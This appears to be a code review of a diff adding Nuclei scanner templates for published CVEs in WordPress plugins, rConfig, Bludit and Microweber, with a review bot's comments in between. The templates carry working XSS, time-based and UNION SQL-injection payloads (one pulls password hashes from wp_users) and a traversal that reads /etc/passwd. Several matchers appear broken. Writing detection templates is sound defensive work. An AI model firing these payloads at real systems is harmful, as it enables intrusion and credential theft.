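Review bot: The matchers only confirm that a CSV of users was exported (`WpUserId`, `Username`, `Usermail`, `text/csv`), not that the injected query ran; the payload wraps `VERSION()` between the markers 0x717a6b7871 and 0x716b707871, which decode to `qzkxq` and `qkpxq`, so adding `contains(body, "qzkxq")` to the body matcher would prove the SQL injection rather than just the missing capability check. The metadata key `public-query` is not a recognised field and should be `publicwww-query`. The tags also omit `sqli` and `unauth` even though the description describes an unauthenticated SQL injection.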
--- /dev/null +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-24979 + +info: + name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting + remediation: version 2.6.6 + reference: + - https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24979 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24979 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: "/wp-content/plugins/paid-memberships-pro/" + max-request: 1 + tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' + condition: and \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 5adc0f9467..685f6840a7 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml 
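Review bot: The tags line says `cve2023` for a 2021 CVE and should be `cve2021`, and `remediation: version 2.6.6` reads as a version label rather than an instruction; `remediation: Fixed in version 2.6.6` matches the other templates. `max-request: 1` should be `max-request: 2`, and the file is committed without a trailing newline (`\ No newline at end of file`), which the repository's linters usually reject. The body matcher expects the literal `+` characters from the query string to appear in the page; that is plausible if the plugin reflects the raw `s` value, but worth a comment since a decoded reflection would contain spaces instead.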
@@ -12,21 +12,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-25016 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016 classification: + cve-id: CVE-2021-25016 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cve-id: CVE-2021-25016 cwe-id: CWE-79 - epss-score: 0.00095 - epss-percentile: 0.39536 - cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: - verified: true max-request: 2 - vendor: premio - product: chaty - framework: wordpress + verified: true publicwww-query: "/wp-content/plugins/chaty/" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty http: - raw: @@ -34,14 +28,11 @@ http: POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and matchers: - type: word @@ -58,4 +49,4 @@ http: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml new file mode 100644 index 0000000000..f16708649e --- /dev/null +++ b/http/cves/2021/CVE-2021-25079.yaml 
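Review bot: The second hunk deletes the blank line between `Content-Type: application/x-www-form-urlencoded` and `log={{username}}&pwd={{password}}&wp-submit=Log+In`, so the credentials become a malformed header line instead of the POST body and the login can no longer succeed; that empty line is the mandatory header/body separator and must stay. The same hunk removes `cookie-reuse: true`, which means even a successful login cookie would not be sent with the second request, and removes `matchers-condition: and`, leaving the default OR so the `status: 200` matcher alone reports a finding on any reachable admin page. Together with the first hunk dropping the cpe/epss/vendor metadata and the `wpscan` tag, this looks like an older copy of the template overwriting the newer one rather than an intended change.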
@@ -0,0 +1,44 @@ +id: CVE-2021-25079 + +info: + name: Contact Form Entries < 1.2.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page + remediation: Fixed in version 1.1.7 + reference: + - https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25079 + - https://wordpress.org/plugins/contact-form-entries/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 2 + google-query: inurl:"/wp-content/plugins/contact-form-entries/" + tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - "contains(body_2, '') && contains(body_2, 'contact-form')" + condition: and diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml new file mode 100644 index 0000000000..29e583fc4a --- /dev/null +++ b/http/cves/2021/CVE-2021-29006.yaml 
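Review bot: The matcher `contains(body_2, '')` is vacuously true, so the template only verifies a 200 containing "contact-form", which a patched plugin also returns to a logged-in admin; the `<script>alert(document.domain)</script>` marker sent in `end_date` appears to have been stripped from the DSL and should be restored there. `remediation: Fixed in version 1.1.7` contradicts the name `Contact Form Entries < 1.2.4`; one of the two version numbers is wrong. The cvss vector `PR:N` next to the `authenticated` tag also deserves a short comment explaining that login is only needed to reach the admin page.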
@@ -0,0 +1,54 @@ +id: CVE-2021-29006 +info: + name: rConfig 3.9.6 - Local File Inclusion + author: r3Y3r53 + severity: medium + description: | + rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server. + reference: + - https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py + - https://nvd.nist.gov/vuln/detail/CVE-2021-29006 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-29006 + cwe-id: CWE-22 + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2021,rconfig,authenticated,lfi + +http: + - raw: + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /dashboard.php HTTP/1.1 + Host: {{Hostname}} + + - | + GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body_3 + regex: + - 'root:.*:0:0:' + + - type: word + part: body_2 + words: + - 'rconfig' + + - type: status + part: header_3 + status: + - 200 diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml new file mode 100644 index 0000000000..0e5a4aa662 --- /dev/null +++ b/http/cves/2021/CVE-2021-35323.yaml 
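Review bot: The final matcher combines `type: status` with `part: header_3`, but `part` is not a field of the status matcher and will be ignored or rejected depending on the engine version; drop the `part:` line and rely on the default, which in a multi-request raw template is the last response. The metadata lacks `max-request: 3` for the three-request flow. The login check `contains(body_2, 'rconfig')` is case-sensitive; if the dashboard only renders "rConfig" that matcher never passes, so confirm the exact string on the verified target.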
@@ -0,0 +1,53 @@ +id: CVE-2021-35323 +info: + name: Bludit 3.13.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login + remediation: Bludit v4.0.0 + reference: + - https://github.com/bludit/bludit/issues/1327 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35323 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-35323 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: title:"Bludit" + tags: cve,cve2021,bludit,xss + +http: + - raw: + - | + GET /bludit/admin/login HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 10s + POST /bludit/admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save= + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "Bludit")' + condition: and + + extractors: + - type: regex + name: tokenCSRF + part: body + group: 1 + regex: + - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"' + internal: true diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml new file mode 100644 index 0000000000..fdabfa9bb5 --- /dev/null +++ b/http/cves/2022/CVE-2022-0228.yaml 
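Review bot: The matcher `contains(body_2, "")` is always true, so the DSL reduces to a 200 HTML page containing "Bludit", which any login page satisfies; the `<img src=x onerror=alert(document.domain)>` marker sent in `username` should be restored in the matcher. Both requests hard-code `/bludit/admin/login`, whereas the rest of the change addresses paths relative to `{{Hostname}}` (the application root); an installation at `/` or any other prefix is silently missed, so the paths should be `/admin/login`. The `@timeout: 10s` on a plain POST has no visible purpose here and can go.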
@@ -0,0 +1,47 @@ +id: CVE-2022-0228 + +info: + name: Popup Builder < 4.0.7 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection. + remediation: update to v.4.0.7 + reference: + - https://wpscan.com/vulnerability/22facac2-52f4-4e5f-be59-1d2934b260d9 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cwe-id: CWE-89 + cve-id: 2022-0228 + cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + publicwww-query: "/wp-content/plugins/popup-builder/" + max-request: 1 + tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 15s + GET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_2>=7' + - 'status_code_2 == 200' + - 'contains_all(body_2, "first name", "last name", "email")' + - 'contains(content_type_2, "application/octet-stream")' + condition: and diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml new file mode 100644 index 0000000000..b8bbd1ed95 --- /dev/null +++ b/http/cves/2022/CVE-2022-0533.yaml 
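Review bot: `cve-id: 2022-0228` is missing the `CVE-` prefix that every other template here uses; it should be `cve-id: CVE-2022-0228`. The time-based check `duration_2>=7` is a single sample with no baseline, so a slow host or a stalled admin redirect can satisfy it without any injection; the same caveat applies to the sleep-based matchers in CVE-2022-0651, CVE-2022-0658, CVE-2022-0787, CVE-2022-25148, CVE-2022-25149, CVE-2022-3142, CVE-2022-40032, CVE-2022-4049, CVE-2022-4059 and CVE-2022-44290 in this commit. A comment above `matchers` such as `# time-based check: compare against an undelayed request before trusting a hit on slow hosts` would at least record the triage caveat in each file.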
@@ -0,0 +1,45 @@ +id: CVE-2022-0533 + +info: + name: Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability. + remediation: upgrade to v.3.0.15 + reference: + - https://wpscan.com/vulnerability/40f36692-c898-4441-ad24-2dc17856bd74 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0533 + - https://vulners.com/cve/CVE-2022-0533 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + publicwww-query: "/wp-content/plugins/ditty-news-ticker/" + tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains_all(body_2, "", "ditty")' + condition: and diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml new file mode 100644 index 0000000000..ad226b7d16 --- /dev/null +++ b/http/cves/2022/CVE-2022-0651.yaml 
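Review bot: `classification` has no `cve-id` entry although the template id is CVE-2022-0533 and the sibling templates all carry one; add `cve-id: CVE-2022-0533`. The first needle in `contains_all(body_2, "", "ditty")` is an empty string as rendered here, which always matches, so the reflected-payload check is effectively absent — confirm the committed file contains the marker the page dropped. `tags` marks the template `authenticated` and the flow logs in first, while `cvss-metrics` says `PR:N`; that is inherited from the advisory but worth a glance since the two disagree.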
@@ -0,0 +1,52 @@ +id: CVE-2022-0651 + +info: + name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection + author: theamanrawat + severity: critical + description: | + The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. + remediation: Update wp-statistics plugin to version 13.1.6, or newer. + reference: + - https://wordpress.org/plugins/wp-statistics/ + - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0651 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0651 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + google-query: inurl:/wp-content/plugins/wp-statistics + tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp,wp-statistics + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 20s + GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home'-sleep(6)-'¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "application/json") + - contains(body, 'Visitor Hit was recorded successfully') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '_wpnonce=([0-9a-zA-Z]+)' + internal: true diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml new file mode 100644 index 0000000000..edf0efdc45 --- /dev/null 
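Review bot: `tags` lists `wp` twice (`sqli,wp,wordpress,wp-plugin,wp,wp-statistics`); drop one occurrence. The three WP Statistics templates in this commit (this one, CVE-2022-25148 and CVE-2022-25149) share the same two-request flow and a 6-second sleep but use `@timeout` values of 20s, 15s and 50s; one value, comfortably above the delay, across all three is easier to reason about. This template and CVE-2022-25148 carry a `remediation` line while CVE-2022-25149 does not, although all three point at the same fixed version.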
+++ b/http/cves/2022/CVE-2022-0658.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-0658 + +info: + name: CommonsBooking < 2.6.8 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection. + remediation: Fixed in version 2.6.8 + reference: + - https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578 + - https://wordpress.org/plugins/commonsbooking/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0658 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0658 + cwe-id: CWE-89 + metadata: + verified: true + google-query: inurl:/wp-content/plugin/commonsbooking/ + max-request: 1 + tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan + +http: + - raw: + - | + @timeout: 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3) + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(header, "application/json")' + - 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")' + condition: and diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml new file mode 100644 index 0000000000..bc2ac15e1d --- /dev/null +++ b/http/cves/2022/CVE-2022-0787.yaml 
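Review bot: `google-query: inurl:/wp-content/plugin/commonsbooking/` uses `plugin` where the WordPress path segment is `plugins`; the dorks elsewhere in this commit all use `/wp-content/plugins/`. It should read `google-query: inurl:/wp-content/plugins/commonsbooking/`, otherwise the query finds nothing.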
@@ -0,0 +1,41 @@ +id: CVE-2022-0787 + +info: + name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections. + remediation: Fixed in version 5.1 + reference: + - https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd + - https://wordpress.org/plugins/wp-limit-failed-login-attempts/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0787 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0787 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts + +http: + - raw: + - | + @timeout: 15s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU) + + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(all_headers, "text/html") + - contains(body, 'iTotalDisplayRecords') + condition: and diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml new file mode 100644 index 0000000000..2727dcb3e1 --- /dev/null +++ b/http/cves/2022/CVE-2022-0814.yaml 
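Review bot: The content check `contains(body, 'iTotalDisplayRecords')` is a generic DataTables field that any AJAX table response carries, so the match rests almost entirely on the timing condition `duration>=6`. The header check reads `all_headers` while the sibling templates use `header`; either works, but one form across the commit is easier to maintain. A plugin-specific marker in the response, if one exists, would make the hit less dependent on timing alone.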
@@ -0,0 +1,51 @@ +id: CVE-2022-0814 + +info: + name: Ubigeo de Peru < 3.6.4 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections. + reference: + - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814 + - https://wordpress.org/plugins/ubigeo-peru/ + remediation: Fixed in version 3.6.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0814 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/ubigeo-peru/" + tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users# + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'idProv' + - 'idDist' + - 'distrito' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml new file mode 100644 index 0000000000..e81decdaa0 --- /dev/null +++ b/http/cves/2022/CVE-2022-0899.yaml 
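Review bot: The request body runs a UNION SELECT that reads `user_login` and `user_pass` from `wp_users`, but nothing in the matchers uses that output — they only look for `idProv`, `idDist` and `distrito`, strings the endpoint presumably returns for any well-formed request. For a detection template, a payload that does not touch credential data (a fixed string or numeric marker in the injected column) plus a matcher on that marker would confirm the injection without pulling the target's password hashes. As written, the `and`-combined word matcher can also fire on a patched plugin that simply returns its normal response.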
@@ -0,0 +1,42 @@ +id: CVE-2022-0899 + +info: + name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0899 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0899 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=hfcm-list&'> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "All Snippets")' + condition: and diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml new file mode 100644 index 0000000000..2951f0b581 --- /dev/null +++ b/http/cves/2022/CVE-2022-2174.yaml 
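Review bot: The second request line `GET /wp-admin/admin.php?page=hfcm-list&'> HTTP/1.1` looks truncated as rendered — the value after `&` is a bare `'>` and the matcher `contains(body_2, "")` tests an empty string — so confirm the committed file carries the percent-encoded payload and its marker. A raw `'>` in a request line is sent verbatim; the other templates percent-encode such characters. `metadata` also lacks `max-request: 2`.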
@@ -0,0 +1,37 @@ +id: CVE-2022-2174 + +info: + name: microweber 1.2.18 - Cross-site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18. + reference: + - https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-2174 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174 + - https://www.tenable.com/cve/CVE-2022-2174 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2022-2174 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2023,microweber,xss,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test" + + matchers: + - type: dsl + dsl: + - 'status_code == 500' + - 'contains(body, "") && contains(body, "microweber")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml new file mode 100644 index 0000000000..02f0d35888 --- /dev/null +++ b/http/cves/2022/CVE-2022-25148.yaml 
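Review bot: `tags` says `cve2023` for a 2022 CVE (`cve,cve2023,microweber,xss,unauth`); it should be `cve2022`. The MITRE reference `cvename.cgi?name=2022-2174` is missing the `CVE-` prefix and will not resolve. `contains(body, "")` is an empty needle as rendered here and always matches — confirm the marker survived in the committed file.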
@@ -0,0 +1,52 @@ +id: CVE-2022-25148 + +info: + name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection + author: theamanrawat + severity: critical + description: | + The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. + remediation: Update wp-statistics plugin to version 13.1.6, or newer. + reference: + - https://wordpress.org/plugins/wp-statistics/ + - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-25148 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25148 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + google-query: inurl:/wp-content/plugins/wp-statistics + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 15s + GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "application/json") + - contains(body, 'Visitor Hit was recorded successfully') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '_wpnonce=([0-9a-zA-Z]+)' + internal: true diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml new file mode 100644 index 0000000000..90c1a08a98 --- /dev/null 
+++ b/http/cves/2022/CVE-2022-25149.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-25149 + +info: + name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection + author: theamanrawat + severity: critical + description: | + The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. + reference: + - https://wordpress.org/plugins/wp-statistics/ + - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-25149 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25149 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/wp-statistics/" + tags: 